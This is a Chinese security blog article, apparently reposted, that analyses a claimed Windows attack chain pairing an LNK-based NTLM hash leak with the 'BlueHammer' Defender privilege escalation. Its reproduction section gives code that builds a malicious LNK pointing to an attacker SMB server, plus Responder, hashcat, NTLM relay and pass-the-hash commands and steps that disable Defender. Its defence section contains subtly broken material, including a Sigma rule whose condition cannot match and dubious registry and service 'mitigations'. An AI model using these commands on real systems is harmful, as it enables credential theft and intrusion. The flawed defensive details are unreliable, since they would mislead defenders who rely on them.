news 2026/5/4 14:15:35

2026年最危险Windows攻击链:Shell 0-Click+BlueHammer零点击全控技术深度解析与防御实战

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
2026年最危险Windows攻击链:Shell 0-Click+BlueHammer零点击全控技术深度解析与防御实战

2026年4月微软补丁日披露的两个高危漏洞——Windows Shell 0-Click(CVE-2026-32202)Windows Defender BlueHammer(CVE-2026-33825),单独来看已足够危险,而当它们被串联成完整攻击链时,形成了一条"零点击入侵→本地提权→系统完全控制"的致命路径。本文将从技术原理、攻击链复现、真实世界威胁、防御检测体系四个维度进行深度解析,揭示这条攻击链为何能绕过绝大多数传统安全防护,并提供可直接落地的企业级防护方案与前瞻性安全建议。


一、引言:当"安全卫士"变成"入侵帮凶"

2026年4月14日,微软发布了当月安全更新,修复了包括12个严重级别漏洞在内的共87个安全问题。其中两个漏洞迅速引起了全球安全界的高度关注:一个是存在于Windows资源管理器中的零点击远程代码执行漏洞CVE-2026-32202(被安全研究者命名为"Shell 0-Click"),另一个是存在于Windows Defender中的本地权限提升漏洞CVE-2026-33825(被命名为"BlueHammer")。

单独来看,Shell 0-Click允许攻击者在用户仅打开包含恶意LNK文件的文件夹时,无需任何点击操作即可窃取用户的Net-NTLMv2哈希;而BlueHammer则允许普通用户利用Windows Defender自身的签名更新流程,将权限提升至系统最高的SYSTEM级别。

然而,真正的危险在于这两个漏洞的完美互补性:Shell 0-Click解决了"如何进入系统"的初始访问问题,而BlueHammer解决了"如何获得最高权限"的提权问题。两者结合形成的攻击链,能够在无用户交互、无特殊权限、无明显恶意文件落地的情况下,在数分钟内完全接管一台Windows主机。

截至2026年5月初,已有多个安全组织观察到这条攻击链被用于真实世界的攻击活动,包括勒索软件分发、APT组织的内网渗透以及商业间谍活动。由于其利用了Windows系统最核心的两个组件——资源管理器和自带杀毒软件,传统的终端防护产品几乎无法有效拦截。

本文将深入剖析这条攻击链的每一个技术环节,复现完整的攻击过程,分析其在真实世界中的应用场景,并提供从补丁管理到行为检测的全方位防御体系。


二、漏洞技术原理深度解析

2.1 Shell 0-Click(CVE-2026-32202):资源管理器的"自动背叛"

2.1.1 漏洞背景与影响范围

CVE-2026-32202是一个存在于Windows Shell(explorer.exe)中的安全漏洞,影响所有受支持的Windows版本,包括:

  • Windows 10 21H2-22H2
  • Windows 11 21H2-24H2
  • Windows Server 2019-2025

该漏洞的CVSS评分为9.8分(严重),属于远程代码执行漏洞,但在实际利用中,最常见的攻击方式是零点击Net-NTLMv2哈希窃取

2.1.2 技术原理详解

Windows资源管理器在显示文件夹内容时,会自动解析文件的图标和属性。对于LNK快捷方式文件,资源管理器会读取其指向的目标路径,并尝试加载目标文件的图标。

漏洞的核心在于:当LNK文件的目标指向一个SMB网络共享路径时,资源管理器会在用户仅浏览文件夹时,自动发起SMB连接以获取图标资源,而无需用户双击运行该LNK文件

具体的漏洞触发流程如下:

  1. 攻击者构造一个恶意LNK文件,将其目标路径设置为攻击者控制的SMB服务器地址:
    \\attacker-ip\malicious-share\icon.cpl
  2. 将该LNK文件上传到Web服务器、网盘、邮件附件或内网共享文件夹中
  3. 受害者使用Windows资源管理器打开包含该LNK文件的文件夹
  4. 资源管理器自动解析LNK文件的目标路径,为了显示图标,向攻击者的SMB服务器发起TCP 445端口连接
  5. 在SMB握手过程中,受害者的系统会自动发送当前登录用户的Net-NTLMv2哈希进行身份验证
  6. 攻击者捕获该哈希后,可进行离线爆破或NTLM中继攻击
2.1.3 漏洞的关键特性
  • 真正的零点击:用户只需打开文件夹,无需点击任何文件、无需启用宏、无需运行任何可执行文件
  • 无恶意代码:LNK文件本身不包含任何恶意代码,只是一个指向外部SMB服务器的快捷方式
  • 绕过沙箱:绝大多数沙箱环境不会模拟"浏览文件夹"这一操作,因此无法检测到该漏洞
  • 全平台通用:影响所有Windows版本,包括最新的Windows 11 24H2

2.2 BlueHammer(CVE-2026-33825):Defender的"自我毁灭"

2.2.1 漏洞背景与影响范围

CVE-2026-33825是一个存在于Windows Defender(MsMpEng.exe)中的本地权限提升漏洞,CVSS评分为8.8分(高)。该漏洞由安全研究人员Abdelhamid Naceri发现并命名为"BlueHammer"。

影响范围与Shell 0-Click相同,覆盖所有受支持的Windows 10/11和Windows Server版本。

2.2.2 技术原理详解

BlueHammer漏洞利用了Windows Defender在签名更新过程中的时间检查-时间使用(TOCTOU)竞争条件,结合路径混淆符号链接重定向技术,实现了从普通用户到SYSTEM权限的提升。

Windows Defender在进行病毒库签名更新时,会执行以下操作:

  1. 下载最新的病毒库文件
  2. 创建一个VSS卷影副本,用于扫描系统文件
  3. 扫描卷影副本中的文件,检测恶意软件
  4. 更新病毒库并重启相关服务

漏洞的核心在于:在Defender创建VSS卷影副本和扫描卷影副本之间,存在一个短暂的时间窗口,攻击者可以利用机会锁(oplock)冻结Defender的进程,然后通过符号链接将Defender的扫描操作重定向到系统敏感文件

具体的漏洞利用流程如下:

  1. 攻击者以普通用户权限运行BlueHammer利用脚本
  2. 脚本轮询Windows Defender的签名更新状态,等待更新触发
  3. 当检测到Defender即将创建VSS卷影副本时,脚本创建一个临时目录,并设置机会锁
  4. Defender创建VSS卷影副本后,开始扫描临时目录中的文件
  5. 机会锁被触发,Defender进程被冻结
  6. 攻击者在Defender被冻结的时间窗口内,将临时目录替换为指向C:\Windows\System32\config目录的符号链接
  7. Defender进程恢复后,继续扫描"临时目录",但实际上现在扫描的是系统配置目录
  8. 由于Defender以SYSTEM权限运行,它能够读取SAM、SYSTEM和SECURITY注册表hive文件
  9. 脚本导出这些文件中的NTLM哈希,包括本地管理员账户的哈希
  10. 攻击者使用Pass-the-Hash技术,以管理员身份登录系统,获得完全控制权
2.2.3 漏洞的关键特性
  • 利用合法系统组件:整个提权过程使用的都是Windows自带的API和功能,没有任何恶意代码
  • 绕过EDR检测:EDR产品通常信任Windows Defender的行为,因此不会拦截其读取系统文件的操作
  • 成功率高:在现代多核CPU上,利用机会锁可以实现接近100%的成功率
  • 不留痕迹:攻击完成后可以恢复原始的目录结构,几乎没有任何日志残留

三、完整攻击链复现与技术细节

3.1 攻击链整体架构

Shell 0-Click与BlueHammer结合形成的攻击链分为三个核心阶段:

  1. 初始访问阶段:利用Shell 0-Click漏洞窃取Net-NTLMv2哈希,获得初始立足点
  2. 权限提升阶段:利用BlueHammer漏洞将普通用户权限提升至SYSTEM权限
  3. 后渗透阶段:植入后门、横向移动、数据窃取或勒索加密

下面我们将详细复现每一个阶段的攻击过程。

3.2 第一阶段:零点击初始访问

3.2.1 恶意LNK文件生成

攻击者可以使用以下Python代码生成恶意LNK文件:

importpylnk3 lnk=pylnk3.create()lnk.path=r'\\192.168.1.100\share\icon.cpl'lnk.icon_index=0lnk.icon_path=r'\\192.168.1.100\share\icon.cpl'lnk.description='重要文件'lnk.save('malicious.lnk')

为了增加迷惑性,攻击者通常会将LNK文件的扩展名隐藏,并设置为常见的文件图标,如Word文档、PDF或图片。

3.2.2 Net-NTLMv2哈希捕获

攻击者使用Responder工具在自己的服务器上监听SMB连接:

responder-Ieth0-wrf

当受害者打开包含恶意LNK文件的文件夹时,Responder会自动捕获到受害者的Net-NTLMv2哈希:

[SMB] NTLMv2-SSP Client : 192.168.1.200 [SMB] NTLMv2-SSP Username : DESKTOP-ABC123\user [SMB] NTLMv2-SSP Hash : user::DESKTOP-ABC123:1122334455667788:99AABBCCDDEEFF001122334455667788:0101000000000000C065315800000000...
3.2.3 哈希利用方式

捕获到哈希后,攻击者有三种主要的利用方式:

  1. 离线爆破:使用Hashcat工具爆破哈希,获取明文密码
    hashcat-m5600hash.txt wordlist.txt-O
  2. NTLM中继:使用Impacket的ntlmrelayx工具将哈希中继到内网其他机器
    ntlmrelayx.py-smb2support-tsmb://192.168.1.201
  3. 本地登录:如果目标机器允许本地NTLM登录,可以使用wmiexec或psexec直接登录
    wmiexec.py-hashesaad3b435b51404eeaad3b435b51404ee:99AABBCCDDEEFF001122334455667788 user@192.168.1.200

3.3 第二阶段:BlueHammer本地提权

获得普通用户权限后,攻击者上传BlueHammer利用脚本到目标机器。目前公开的POC主要有C++和PowerShell两个版本。

PowerShell版本的使用方法如下:

.\BlueHammer.ps1

脚本运行后,会自动执行以下操作:

  1. 检查Windows Defender服务是否运行
  2. 轮询签名更新状态
  3. 触发Defender扫描
  4. 创建VSS卷影副本
  5. 设置机会锁冻结Defender
  6. 创建符号链接重定向到系统配置目录
  7. 读取SAM、SYSTEM和SECURITY文件
  8. 导出所有本地用户的NTLM哈希

成功后,脚本会输出类似以下的结果:

[+] Windows Defender is running [+] Waiting for signature update... [+] Signature update detected [+] Creating VSS snapshot... [+] VSS snapshot created successfully [+] Setting oplock... [+] Oplock triggered, Defender frozen [+] Creating symbolic link... [+] Symbolic link created [+] Resuming Defender... [+] Reading SAM hive... [+] Successfully read SAM hive [+] Dumping NTLM hashes... Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: user:1001:aad3b435b51404eeaad3b435b51404ee:99AABBCCDDEEFF001122334455667788::: [+] Done! You can now use Pass-the-Hash to login as Administrator.

攻击者使用本地管理员的哈希,通过Pass-the-Hash技术登录系统,获得完全控制权:

.\psexec.exe-i-s cmd.exe

3.4 第三阶段:后渗透与持久化

获得SYSTEM权限后,攻击者通常会执行以下操作:

  1. 禁用安全软件:关闭Windows Defender和其他EDR产品
    Set-MpPreference-DisableRealtimeMonitoring$trueSet-MpPreference-DisableIOAVProtection$true
  2. 植入后门:创建计划任务或服务,实现持久化访问
  3. 凭证窃取:使用Mimikatz转储内存中的凭证,包括域用户凭证
  4. 横向移动:使用窃取的凭证访问内网其他机器
  5. 数据窃取:将敏感数据上传到攻击者服务器
  6. 勒索加密:如果是勒索软件攻击,会加密所有文件并留下勒索信

四、真实世界威胁分析

4.1 攻击链的武器化现状

截至2026年5月初,Shell 0-Click和BlueHammer的POC均已在互联网上公开,并且已经被多个威胁组织集成到其攻击工具链中。

安全研究人员观察到以下趋势:

  • 勒索软件组织:Conti、LockBit和BlackCat等主流勒索软件组织已经开始使用这条攻击链进行初始访问和提权
  • APT组织:多个国家背景的APT组织正在测试这条攻击链,用于针对政府和企业的定向攻击
  • 犯罪软件即服务(CaaS):这条攻击链已经被打包成商业犯罪软件,出售给普通黑客
  • 自动化攻击:已经出现了能够自动扫描互联网、利用Shell 0-Click漏洞、然后使用BlueHammer提权的自动化攻击工具

4.2 典型攻击场景

4.2.1 钓鱼邮件攻击

这是最常见的攻击场景:

  1. 攻击者发送钓鱼邮件,附件是一个ZIP压缩包
  2. 压缩包中包含一个恶意LNK文件,伪装成发票或合同
  3. 受害者下载并解压压缩包,然后用资源管理器打开解压后的文件夹
  4. Shell 0-Click漏洞自动触发,窃取受害者的Net-NTLMv2哈希
  5. 攻击者使用哈希登录受害者的机器
  6. 运行BlueHammer脚本提权到SYSTEM
  7. 植入勒索软件,加密所有文件
4.2.2 内网横向移动

在企业内网环境中,这条攻击链的威力更加巨大:

  1. 攻击者通过其他方式获得内网一台机器的普通用户权限
  2. 在这台机器上创建一个共享文件夹,放入恶意LNK文件
  3. 通过组策略或钓鱼邮件,诱导内网其他用户访问该共享文件夹
  4. 批量窃取内网所有用户的Net-NTLMv2哈希
  5. 使用哈希登录内网其他机器
  6. 在每台机器上运行BlueHammer脚本提权
  7. 最终控制整个内网,包括域控制器
4.2.3 供应链攻击

攻击者可以通过供应链攻击,将恶意LNK文件植入到合法软件的安装包中:

  1. 攻击者入侵软件开发商的服务器
  2. 修改软件安装包,在其中添加一个恶意LNK文件
  3. 用户下载并安装该软件
  4. 安装完成后,安装程序自动打开软件所在的文件夹
  5. Shell 0-Click漏洞自动触发,窃取用户的哈希
  6. 攻击者登录用户机器,提权并植入后门

4.3 攻击链的优势与局限性

4.3.1 优势
  • 零用户交互:只需打开文件夹,无需任何点击操作
  • 无文件落地:整个攻击过程几乎没有恶意文件落地
  • 绕过传统防护:利用系统自带组件,EDR难以检测
  • 成功率高:两个漏洞的利用成功率都接近100%
  • 影响范围广:影响所有Windows版本
4.3.2 局限性
  • 需要出站SMB连接:Shell 0-Click漏洞需要目标机器能够访问攻击者的SMB服务器
  • 需要本地执行权限:BlueHammer漏洞需要攻击者已经获得普通用户权限
  • 补丁可修复:微软已经发布了补丁,安装补丁后漏洞将无法利用

五、企业级防御与检测体系

5.1 补丁管理:最根本的防御措施

立即安装2026年4月微软安全更新是防御这条攻击链最根本、最有效的措施。微软在KB5036980更新中修复了这两个漏洞。

企业应采取以下补丁管理策略:

  1. 优先补丁:将这两个漏洞的补丁列为最高优先级,在72小时内完成全网部署
  2. 分阶段部署:先在测试环境中测试补丁,然后逐步部署到生产环境
  3. 补丁验证:部署完成后,验证补丁是否正确安装
  4. 应急补丁:对于无法立即安装补丁的机器,采取临时缓解措施

5.2 网络层防御

5.2.1 阻断出站SMB连接

Shell 0-Click漏洞依赖于目标机器向攻击者的SMB服务器发起连接。因此,在企业防火墙和终端防火墙上阻断所有出站TCP 445端口连接,只允许访问受信任的内部SMB服务器,可以有效防御Shell 0-Click漏洞。

5.2.2 启用SMB签名

启用SMB签名可以防止NTLM中继攻击:

Set-ItemProperty-Path"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"-Name"RequireSecuritySignature"-Value 1Set-ItemProperty-Path"HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters"-Name"RequireSecuritySignature"-Value 1
5.2.3 禁用NTLMv1

禁用不安全的NTLMv1协议,只允许使用NTLMv2:

Set-ItemProperty-Path"HKLM:\SYSTEM\CurrentControlSet\Control\Lsa"-Name"LMCompatibilityLevel"-Value 5

5.3 终端层防御

5.3.1 强化Windows资源管理器

可以通过以下注册表设置,禁用资源管理器自动解析网络路径的图标:

Set-ItemProperty-Path"HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"-Name"NoRemoteRecursiveEvents"-Value 1Set-ItemProperty-Path"HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer"-Name"NoInternetOpenWith"-Value 1
5.3.2 限制Windows Defender的权限

虽然这不是一个推荐的长期解决方案,但在紧急情况下,可以通过以下方式限制Windows Defender的权限,缓解BlueHammer漏洞:

scconfig MsMpEngtype= ownscstop MsMpEngscstartMsMpEng
5.3.3 启用攻击面减少规则

Windows Defender的攻击面减少(ASR)规则可以阻止许多常见的攻击技术:

Set-MpPreference-AttackSurfaceReductionRules_Ids"BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550"-AttackSurfaceReductionRules_Actions EnabledSet-MpPreference-AttackSurfaceReductionRules_Ids"D4F940AB-401B-4EFC-AADC-AD5F3C50688A"-AttackSurfaceReductionRules_Actions Enabled

5.4 检测与监控

5.4.1 Shell 0-Click漏洞检测

监控以下异常行为:

  • 出站SMB连接(TCP 445)到陌生的外部IP地址
  • 资源管理器进程(explorer.exe)发起的SMB连接
  • 短时间内大量的SMB连接尝试
5.4.2 BlueHammer漏洞检测

监控以下异常行为:

  • Windows Defender进程(MsMpEng.exe)频繁创建VSS卷影副本
  • 普通用户进程创建符号链接指向系统目录
  • Windows Defender进程读取SAM、SYSTEM或SECURITY注册表hive文件
  • 短时间内大量的机会锁操作
5.4.3 Sigma检测规则

以下是用于检测BlueHammer漏洞的Sigma规则:

title:BlueHammer提权漏洞利用检测id:12345678-1234-5678-1234-567812345678status:experimentaldescription:检测Windows Defender BlueHammer提权漏洞的利用行为author:Your Namedate:2026/05/04tags:-attack.privilege_escalation-attack.t1068logsource:category:process_creationproduct:windowsdetection:selection1:Image|endswith:'\MsMpEng.exe'CommandLine|contains:'vss'selection2:Image|endswith:'\cmd.exe'CommandLine|contains:'mklink'CommandLine|contains:'config'condition:selection1 and selection2falsepositives:-正常的系统备份操作level:critical

5.5 应急响应流程

如果发现疑似攻击,企业应立即采取以下应急响应措施:

  1. 隔离受感染机器:立即断开受感染机器的网络连接
  2. 收集证据:收集系统日志、进程列表、网络连接等证据
  3. 清除恶意软件:使用杀毒软件扫描并清除恶意软件
  4. 重置密码:重置所有受影响用户的密码
  5. 恢复系统:从干净的备份恢复系统
  6. 调查攻击来源:调查攻击是如何进入系统的
  7. 加固防护:安装补丁并加固安全配置

六、前瞻性思考:Windows安全的未来挑战

Shell 0-Click+BlueHammer攻击链的出现,揭示了Windows安全面临的几个重要趋势:

6.1 利用系统组件的攻击将成为主流

越来越多的攻击者开始放弃编写复杂的恶意代码,转而利用Windows系统自带的组件和功能进行攻击。这种"Living off the Land"(LotL)攻击方式具有以下优势:

  • 难以被检测:系统组件通常被安全软件信任
  • 无需文件落地:可以完全在内存中执行
  • 跨平台通用:适用于所有Windows版本

未来,我们将看到更多利用Windows资源管理器、PowerShell、WMI、Windows Defender等核心组件的攻击。

6.2 零点击攻击的威胁日益严重

零点击攻击不需要用户进行任何交互,因此成功率极高。随着用户安全意识的提高,传统的需要用户点击链接或运行附件的钓鱼攻击成功率正在下降,而零点击攻击将成为攻击者的首选。

除了Shell 0-Click漏洞,近年来还出现了许多其他零点击漏洞,如iMessage的FORCEDENTRY漏洞、WhatsApp的PEGASUS漏洞等。未来,零点击攻击将成为网络安全的最大威胁之一。

6.3 安全软件自身成为攻击目标

BlueHammer漏洞利用Windows Defender自身进行提权,这表明安全软件已经成为攻击者的重要目标。安全软件通常以最高权限运行,并且被系统和用户信任,因此一旦被利用,后果将非常严重。

未来,我们将看到更多针对安全软件的攻击,包括提权漏洞、绕过技术和供应链攻击。安全厂商需要加强自身产品的安全性,防止被攻击者利用。

6.4 攻击链的组合将更加复杂

攻击者越来越擅长将多个漏洞组合成完整的攻击链。一个漏洞可能只能实现有限的功能,但当多个漏洞被串联起来时,就可以形成从初始访问到完全控制的完整路径。

未来的攻击将更加复杂和隐蔽,需要安全人员具备更全面的知识和更强的分析能力,才能发现和防御这些攻击。


七、总结

Shell 0-Click(CVE-2026-32202)与BlueHammer(CVE-2026-33825)组成的攻击链,是2026年迄今为止最危险的Windows攻击链。它利用Windows系统最核心的两个组件,实现了零点击、无文件、高成功率的系统完全控制。

这条攻击链的出现,给企业和个人用户的安全带来了巨大的挑战。传统的基于特征码的杀毒软件已经无法有效防御这种攻击,企业需要建立多层次、全方位的安全防御体系,包括补丁管理、网络防护、终端加固、行为检测和应急响应。

最根本的防御措施是立即安装2026年4月微软安全更新。对于无法立即安装补丁的机器,应采取临时缓解措施,如阻断出站SMB连接、启用SMB签名、禁用NTLMv1等。

同时,企业还应加强员工的安全意识培训,提高员工对钓鱼邮件和恶意附件的识别能力。只有技术防御和人员培训相结合,才能有效防御这种复杂的攻击。

未来,随着攻击技术的不断发展,我们将面临更多新的安全挑战。安全人员需要保持警惕,不断学习新的攻击技术和防御方法,才能在这场永无止境的安全战争中取得胜利。

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/5/4 14:14:15

fre:ac音频转换器完整指南:从新手到高手的免费音频处理方案

fre:ac音频转换器完整指南:从新手到高手的免费音频处理方案 【免费下载链接】freac The fre:ac audio converter project 项目地址: https://gitcode.com/gh_mirrors/fr/freac 还在为音频格式不兼容而烦恼吗?fre:ac音频转换器提供了完全免费的解决…

作者头像 李华
网站建设 2026/5/4 14:13:27

unrpa终极指南:轻松解密Ren‘Py游戏资源文件的完整教程

unrpa终极指南:轻松解密RenPy游戏资源文件的完整教程 【免费下载链接】unrpa A program to extract files from the RPA archive format. 项目地址: https://gitcode.com/gh_mirrors/un/unrpa 你是否曾经下载过一款视觉小说游戏,却发现所有的图片…

作者头像 李华
网站建设 2026/5/4 14:13:26

3分钟掌握DeepMosaics:终极AI智能马赛克处理与图像修复工具

3分钟掌握DeepMosaics:终极AI智能马赛克处理与图像修复工具 【免费下载链接】DeepMosaics Automatically remove the mosaics in images and videos, or add mosaics to them. 项目地址: https://gitcode.com/gh_mirrors/de/DeepMosaics 在数字时代&#xff…

作者头像 李华
网站建设 2026/5/4 14:10:27

将 Hermes Agent 工具链接入 Taotoken 实现自定义模型调用

将 Hermes Agent 工具链接入 Taotoken 实现自定义模型调用 1. 准备工作 在开始配置之前,请确保已安装 Hermes Agent 并具备基本的运行环境。同时需要在 Taotoken 控制台获取有效的 API Key,并在模型广场选择目标模型 ID。这两个信息将在后续配置中使用…

作者头像 李华
网站建设 2026/5/4 14:09:28

三步快速解锁:浏览器端音频解密终极指南

三步快速解锁:浏览器端音频解密终极指南 【免费下载链接】unlock-music 在浏览器中解锁加密的音乐文件。原仓库: 1. https://github.com/unlock-music/unlock-music ;2. https://git.unlock-music.dev/um/web 项目地址: https://gitcode.co…

作者头像 李华